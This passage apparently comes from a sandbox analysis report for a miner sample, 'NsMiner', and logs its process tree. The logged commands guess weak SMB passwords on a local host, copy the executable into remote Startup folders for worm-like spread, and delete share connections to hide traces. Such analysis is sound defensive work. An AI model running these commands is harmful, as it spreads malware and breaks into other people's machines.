"%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
PID:3544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:5220 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:348
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:2120
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:7396
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:7800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:5628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "6⤵PID:212
-
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2557⤵
- Discovers systems in the same network
PID:6424
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:1848
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:7932
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4784
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:396
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6364
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6808
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4732
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5544
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5864
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5996
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:6228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5648
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5184
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:6704
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:3992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "6⤵PID:7456
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"7⤵PID:4060
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:6312
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7908
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4848
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6208
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8008
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7632
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2124
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6464
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5032
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:7536
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:5512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5312
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:6852
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "6⤵PID:6512
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"7⤵PID:7076
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5920
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5928
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5244
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"6⤵PID:3788
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"6⤵PID:1440
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6748
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"1"6⤵PID:6724
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"1"6⤵PID:6580
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4608
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"6⤵PID:6000
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"6⤵PID:7476
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7496
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"1"6⤵PID:6448
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"1"6⤵PID:5580
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6960
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"1"6⤵PID:7932
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"1"6⤵PID:996
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2608
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"10.127.255.255"6⤵PID:6004
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"10.127.255.255"6⤵PID:7804
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3824
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"10.127.255.255"6⤵PID:1248
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"10.127.255.255"6⤵PID:4208
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4536
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"10.127.255.255"6⤵PID:6480
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"10.127.255.255"6⤵PID:5612
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4296
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"6⤵PID:6184
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"6⤵PID:8140
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2888
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"10.127.255.255"6⤵PID:7228
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"10.127.255.255"6⤵PID:3400
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5876
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"10.127.255.255"6⤵PID:8040
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"10.127.255.255"6⤵PID:5212
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1128
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"administrator"6⤵PID:6004
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"administrator"6⤵PID:5152
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1712
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"administrator"6⤵PID:7536
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"administrator"6⤵PID:348
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3824
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"administrator"6⤵PID:5388
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"administrator"6⤵PID:7540
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5548
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "administrator" /user:"administrator"6⤵PID:7036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "administrator" /user:"administrator"6⤵PID:7652
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3912
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1605" /user:"administrator"6⤵PID:4828
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1605" /user:"administrator"6⤵PID:6684
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3492
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"administrator"6⤵PID:4512
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"administrator"6⤵PID:1836
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7420
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"user"6⤵PID:6048
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"user"6⤵PID:6168
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7884
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"user"6⤵PID:4160
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"user"6⤵PID:6576
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5312
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"user"6⤵PID:6344
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"user"6⤵PID:4104
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1608
-
-
